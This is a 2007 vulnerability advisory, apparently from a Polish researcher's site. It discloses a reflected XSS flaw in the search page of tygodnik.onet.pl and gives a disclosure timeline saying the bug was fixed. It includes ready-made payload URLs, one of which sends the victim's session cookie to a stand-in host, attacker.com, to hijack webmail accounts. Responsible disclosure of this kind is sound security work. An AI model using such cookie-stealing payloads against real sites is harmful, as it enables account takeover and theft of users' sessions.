Zapraszam na bloga o botnetach i złośliwym oprogramowaniu: bothunters.pl
kanedaaa... ... borys ... bohater ...
slackware - pakiety faqsecuritypublicartprocessinglinux mojetestslinkistatsstart
kaneda@bohater.net
+ Subject:
XSS bug for www.onet.pl

+ Version:
2007.03.04

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ onet.pl Description:
Onet.pl is the most famous Polish web portal. It is an interactive communication platform that runs millions e-mail accounts (poczta.onet.pl) system.

+ Description:
XSS IN:
http://tygodnik.onet.pl/fts.html?qt=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&szukaj.x=0&szukaj.y=0

http://tygodnik.onet.pl/fts.html?qt=%22%3E%3Cscript%3Elocation.href='http://attacker.com/xss.php?cook='%2Bescape(document.cookie)%3C%2Fscript%3E&szukaj.x=0&szukaj.y=0

That is a possibility to take over an user account from the mail service at http://poczta.onet.pl [and others in *.onet.pl domain] when the logged user would click at specially crafted URL.



Timeline:
2007.03.04 bug discovered
2007.03.04 bug sent via email from http://pomoc.onet.pl/index.html?KAT=1148
2007.03.07 response via email from Abuse Onet
2007.03.30 its fixed now (probably fixed earlier)
Original Advisory: http://kaneda.bohater.net/security/20070304-xss-onet.pl.php

Check my other bugs in security section: Security